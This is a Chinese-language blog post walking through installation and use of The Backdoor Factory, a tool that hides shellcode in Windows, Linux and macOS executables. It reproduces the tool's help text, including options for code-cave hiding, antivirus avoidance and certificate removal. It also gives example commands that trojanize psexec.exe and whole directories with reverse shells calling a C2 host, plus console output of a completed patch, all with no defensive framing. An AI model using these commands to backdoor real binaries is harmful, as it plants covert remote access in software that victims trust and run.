`

the-backdoor-factory

 
阅读更多
参考:https://github.com/secretsquirrel/the-backdoor-factory
貌似很有趣,值得深入了解了解
安装过程 
1. easy_install
wget "https://pypi.python.org/packages/source/e/ez_setup/ez_setup-0.9.tar.gz#md5=1ac53445a67bf68eb2676a72cc3f87f8" -O easy.tar.gz
tar vxf easy.tar.gz
cd ez_setup-0.9/
python ez_setup.py
2. 安装pip
wget 'https://pypi.python.org/packages/source/p/pip/pip-1.5.6.tar.gz#md5=01026f87978932060cc86c1dc527903e' -O pip.tar.gz
tar vxf pip.tar.gz
python setup.py install
3. 安装the-backdoor-factory
wget https://github.com/secretsquirrel/the-backdoor-factory/archive/master.zip
unzip master.zip
cd the-backdoor-factory-master/
./install.sh


支持格式:
引用
Windows PE x86/x64,ELF x86/x64 (System V, FreeBSD, ARM Little Endian x32),
and Mach-O x86/x64 and those formats in FAT files

Packed Files: PE UPX x86/x64

Experimental: OpenBSD x32


使用 
root@kali:~/the-backdoor-factory-master# ./backdoor.py  -h
Usage: backdoor.py [options]

Options:
  -h, --help            show this help message and exit
  -f FILE, --file=FILE  File to backdoor
  -s SHELL, --shell=SHELL
                        Payloads that are available for use. Use 'show' to see
                        payloads.
  -H HOST, --hostip=HOST
                        IP of the C2 for reverse connections.
  -P PORT, --port=PORT  The port to either connect back to for reverse shells
                        or to listen on for bind shells
  -J, --cave_jumping    Select this options if you want to use code cave
                        jumping to further hide your shellcode in the binary.
  -a, --add_new_section
                        Mandating that a new section be added to the exe
                        (better success) but less av avoidance
  -U SUPPLIED_SHELLCODE, --user_shellcode=SUPPLIED_SHELLCODE
                        User supplied shellcode, make sure that it matches the
                        architecture that you are targeting.
  -c, --cave            The cave flag will find code caves that can be used
                        for stashing shellcode. This will print to all the
                        code caves of a specific size.The -l flag can be use
                        with this setting.
  -l SHELL_LEN, --shell_length=SHELL_LEN
                        For use with -c to help find code caves of different
                        sizes
  -o OUTPUT, --output-file=OUTPUT
                        The backdoor output file
  -n NSECTION, --section=NSECTION
                        New section name must be less than seven characters
  -d DIR, --directory=DIR
                        This is the location of the files that you want to
                        backdoor. You can make a directory of file backdooring
                        faster by forcing the attaching of a codecave to the
                        exe by using the -a setting.
  -w, --change_access   This flag changes the section that houses the codecave
                        to RWE. Sometimes this is necessary. Enabled by
                        default. If disabled, the backdoor may fail.
  -i, --injector        This command turns the backdoor factory in a hunt and
                        shellcode inject type of mechinism. Edit the target
                        settings in the injector module.
  -u SUFFIX, --suffix=SUFFIX
                        For use with injector, places a suffix on the original
                        file for easy recovery
  -D, --delete_original
                        For use with injector module.  This command deletes
                        the original file.  Not for use in production systems.
                        *Author not responsible for stupid uses.*
  -O DISK_OFFSET, --disk_offset=DISK_OFFSET
                        Starting point on disk offset, in bytes. Some authors
                        want to obfuscate their on disk offset to avoid
                        reverse engineering, if you find one of those files
                        use this flag, after you find the offset.
  -S, --support_check   To determine if the file is supported by BDF prior to
                        backdooring the file. For use by itself or with
                        verbose. This check happens automatically if the
                        backdooring is attempted.
  -M, --cave-miner      Future use, to help determine smallest shellcode
                        possible in a PE file
  -q, --no_banner       Kills the banner.
  -v, --verbose         For debug information output.
  -T IMAGE_TYPE, --image-type=IMAGE_TYPE
                        ALL, x86, or x64 type binaries only. Default=ALL
  -Z, --zero_cert       Allows for the overwriting of the pointer to the PE
                        certificate table effectively removing the certificate
                        from the binary for all intents and purposes.
  -R, --runas_admin     Checks the PE binaries for 'requestedExecutionLevel
                        level="highestAvailable"'. If this string is included
                        in the binary, it must run as system/admin. Doing this
                        slows patching speed significantly.
  -L, --patch_dll       Use this setting if you DON'T want to patch DLLs.
                        Patches by default.
  -F FAT_PRIORITY, --FAT_PRIORITY=FAT_PRIORITY
                        For MACH-O format. If fat file, focus on which arch to
                        patch. Default is x64. To force x86 use -F x86, to
                        force both archs use -F ALL.


例子: 
./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp 

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a

./backdoor.py -d test/ -i 192.168.0.100 -p 8080 -s reverse_shell_tcp -a

msfpayload windows/exec CMD='calc.exe' R > calc.bin
./backdoor.py -f ls -s user_supplied_shellcode -U calc.bin
root@kali:~/the-backdoor-factory-master# ./backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin


./backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a -u .moocowwow


引用

root@kali:~/the-backdoor-factory-master# ./backdoor.py -f ls  -U calc.bin
-.(`-')  (`-')  _           <-.(`-') _(`-')                            (`-')
__( OO)  (OO ).-/  _         __( OO)( (OO ).->     .->        .->   <-.(OO )
'-'---.\  / ,---.   \-,-----.'-'. ,--.\    .'_ (`-')----. (`-')----. ,------,)
| .-. (/  | \ /`.\   |  .--./|  .'   /'`'-..__)( OO).-.  '( OO).-.  '|   /`. '
| '-' `.) '-'|_.' | /_) (`-')|      /)|  |  ' |( _) | |  |( _) | |  ||  |_.' |
| /`'.  |(|  .-.  | ||  |OO )|  .   ' |  |  / : \|  |)|  | \|  |)|  ||  .   .'
| '--'  / |  | |  |(_'  '--'\|  |\   \|  '-'  /  '  '-'  '  '  '-'  '|  |\  \
`------'  `--' `--'   `-----'`--' '--'`------'    `-----'    `-----' `--' '--'
           (`-')  _           (`-')                   (`-')
   <-.     (OO ).-/  _        ( OO).->       .->   <-.(OO )      .->
(`-')-----./ ,---.   \-,-----./    '._  (`-')----. ,------,) ,--.'  ,-.
(OO|(_\---'| \ /`.\   |  .--./|'--...__)( OO).-.  '|   /`. '(`-')'.'  /
/ |  '--. '-'|_.' | /_) (`-')`--.  .--'( _) | |  ||  |_.' |(OO \    /
\_)  .--'(|  .-.  | ||  |OO )   |  |    \|  |)|  ||  .   .' |  /   /)
  `|  |_)  |  | |  |(_'  '--'\   |  |     '  '-'  '|  |\  \  `-/   /`
   `--'    `--' `--'   `-----'   `--'      `-----' `--' '--'   `--'

         Author:    Joshua Pitts
         Email:     the.midnite.runr[a t]gmail<d o t>com
         Twitter:   @midnite_runr

         2.3.1
  • Checking file support
  • System Type Supported: System V
  • Gathering file info
  • Getting shellcode length
    • The following LinuxIntelELF32s are available:
       reverse_shell_tcp
       reverse_tcp_stager
       user_supplied_shellcode
    [!] Could not set shell


    引用

    root@kali:~/the-backdoor-factory-master# ./backdoor.py -f ls -s reverse_shell_tcp -U calc.bin
    -.(`-')  (`-')  _           <-.(`-') _(`-')                            (`-')
    __( OO)  (OO ).-/  _         __( OO)( (OO ).->     .->        .->   <-.(OO )
    '-'---.\  / ,---.   \-,-----.'-'. ,--.\    .'_ (`-')----. (`-')----. ,------,)
    | .-. (/  | \ /`.\   |  .--./|  .'   /'`'-..__)( OO).-.  '( OO).-.  '|   /`. '
    | '-' `.) '-'|_.' | /_) (`-')|      /)|  |  ' |( _) | |  |( _) | |  ||  |_.' |
    | /`'.  |(|  .-.  | ||  |OO )|  .   ' |  |  / : \|  |)|  | \|  |)|  ||  .   .'
    | '--'  / |  | |  |(_'  '--'\|  |\   \|  '-'  /  '  '-'  '  '  '-'  '|  |\  \
    `------'  `--' `--'   `-----'`--' '--'`------'    `-----'    `-----' `--' '--'
               (`-')  _           (`-')                   (`-')
       <-.     (OO ).-/  _        ( OO).->       .->   <-.(OO )      .->
    (`-')-----./ ,---.   \-,-----./    '._  (`-')----. ,------,) ,--.'  ,-.
    (OO|(_\---'| \ /`.\   |  .--./|'--...__)( OO).-.  '|   /`. '(`-')'.'  /
    / |  '--. '-'|_.' | /_) (`-')`--.  .--'( _) | |  ||  |_.' |(OO \    /
    \_)  .--'(|  .-.  | ||  |OO )   |  |    \|  |)|  ||  .   .' |  /   /)
      `|  |_)  |  | |  |(_'  '--'\   |  |     '  '-'  '|  |\  \  `-/   /`
       `--'    `--' `--'   `-----'   `--'      `-----' `--' '--'   `--'

             Author:    Joshua Pitts
             Email:     the.midnite.runr[a t]gmail<d o t>com
             Twitter:   @midnite_runr

             2.3.1
  • Checking file support
  • System Type Supported: System V
  • Gathering file info
  • Getting shellcode length
    • Must provide port
  • Setting selected shellcode
    • Must provide port
  • Patching x86 Binary
    • [!] Patching Complete
    File ls is in the 'backdoored' directory
    分享到:
    | [工具]PCredz
    评论
    发表评论

    您还没有登录,请您登录后再发表评论

    相关推荐

    Magicbox
    Global site tag (gtag.js) - Google Analytics